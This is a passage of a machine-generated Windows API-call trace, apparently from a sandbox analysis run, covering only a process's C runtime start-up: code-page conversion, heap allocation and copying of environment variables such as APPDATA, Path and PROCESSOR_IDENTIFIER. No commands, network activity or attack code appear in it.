!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0068.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e9d0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ®¹%«\x0cí\x18", lpUsedDefaultChar=0x0) returned 256 [0068.592] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0068.592] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4096ac [0068.603] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a20da8) returned 0x80 [0068.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0068.604] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x1f) returned 0x4a1ef40 [0068.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x4a1ef40, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0068.604] GetLastError () returned 0x0 [0068.604] SetLastError (dwErrCode=0x0) [0068.604] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x4) returned 0x4a21058 [0068.604] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21058) returned 0x4 [0068.604] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21058, Size=0x8) returned 0x4a21058 [0068.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0068.604] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x36) returned 0x4a21068 [0068.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x4a21068, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0068.604] GetLastError () returned 0x0 [0068.604] SetLastError (dwErrCode=0x0) [0068.604] GetLastError () returned 0x0 [0068.604] SetLastError (dwErrCode=0x0) [0068.604] GetLastError () returned 0x0 [0068.604] SetLastError (dwErrCode=0x0) [0068.604] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21058) returned 0x8 [0068.604] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21058, Size=0xc) returned 0x4a210a8 [0068.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0068.605] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x37) returned 0x4a210c0 [0068.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x4a210c0, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a210a8) returned 0xc [0068.605] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a210a8, Size=0x10) returned 0x4a210a8 [0068.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0068.605] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x3c) returned 0x4a14cd0 [0068.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x4a14cd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a210a8) returned 0x10 [0068.606] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a210a8, Size=0x14) returned 0x4a21100 [0068.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0068.606] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x31) returned 0x4a21120 [0068.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x4a21120, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21100) returned 0x14 [0068.607] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21100, Size=0x18) returned 0x4a21100 [0068.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0068.607] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x17) returned 0x4a21160 [0068.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x4a21160, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21100) returned 0x18 [0068.608] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21100, Size=0x1c) returned 0x4a21180 [0068.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0068.608] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x24) returned 0x4a1a938 [0068.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x4a1a938, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.609] SetLastError (dwErrCode=0x0) [0068.609] GetLastError () returned 0x0 [0068.609] SetLastError (dwErrCode=0x0) [0068.609] GetLastError () returned 0x0 [0068.609] SetLastError (dwErrCode=0x0) [0068.609] GetLastError () returned 0x0 [0068.609] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21180) returned 0x1c [0068.609] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21180, Size=0x20) returned 0x4a21180 [0068.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0068.609] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x14) returned 0x4a21100 [0068.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x4a21100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0068.609] GetLastError () returned 0x0 [0068.609] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21180) returned 0x20 [0068.609] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21180, Size=0x24) returned 0x4a21180 [0068.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.609] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0xd) returned 0x4a1df58 [0068.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x4a1df58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0068.609] GetLastError () returned 0x0 [0068.609] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21180) returned 0x24 [0068.609] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21180, Size=0x28) returned 0x4a21180 [0068.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0068.609] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x25) returned 0x4a1a968 [0068.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x4a1a968, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0068.609] GetLastError () returned 0x0 [0068.610] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21180) returned 0x28 [0068.610] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21180, Size=0x2c) returned 0x4a21180 [0068.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0068.610] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x39) returned 0x4a14d18 [0068.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x4a14d18, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0068.610] GetLastError () returned 0x0 [0068.610] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21180) returned 0x2c [0068.610] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21180, Size=0x30) returned 0x4a21180 [0068.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0068.610] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x18) returned 0x4a211b8 [0068.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x4a211b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0068.610] GetLastError () returned 0x0 [0068.610] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21180) returned 0x30 [0068.610] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21180, Size=0x34) returned 0x4a211d8 [0068.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0068.610] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x17) returned 0x4a21180 [0068.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x4a21180, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0068.610] GetLastError () returned 0x0 [0068.610] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a211d8) returned 0x34 [0068.610] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a211d8, Size=0x38) returned 0x4a211d8 [0068.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.610] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0xe) returned 0x4a1df70 [0068.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x4a1df70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0068.610] GetLastError () returned 0x0 [0068.610] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a211d8) returned 0x38 [0068.610] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a211d8, Size=0x3c) returned 0x4a211d8 [0068.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0068.611] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x69) returned 0x4a21220 [0068.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x4a21220, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0068.611] GetLastError () returned 0x0 [0068.611] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a211d8) returned 0x3c [0068.611] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a211d8, Size=0x40) returned 0x4a211d8 [0068.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0068.611] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x3e) returned 0x4a14d60 [0068.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x4a14d60, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0068.611] GetLastError () returned 0x0 [0068.611] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a211d8) returned 0x40 [0068.611] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a211d8, Size=0x44) returned 0x4a21298 [0068.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0068.611] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x1b) returned 0x4a1ef68 [0068.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x4a1ef68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0068.611] GetLastError () returned 0x0 [0068.611] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21298) returned 0x44 [0068.611] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21298, Size=0x48) returned 0x4a21298 [0068.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0068.611] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x1d) returned 0x4a21300 [0068.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x4a21300, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0068.611] GetLastError () returned 0x0 [0068.611] RtlSizeHeap (HeapHandle=0x4a00000, Flags=0x0, MemoryPointer=0x4a21298) returned 0x48 [0068.611] RtlReAllocateHeap (Heap=0x4a00000, Flags=0x0, Ptr=0x4a21298, Size=0x4c) returned 0x4a21ae8 [0068.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0068.611] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x48) returned 0x4a17340 [0068.612] WideCharToMultiByte (in: 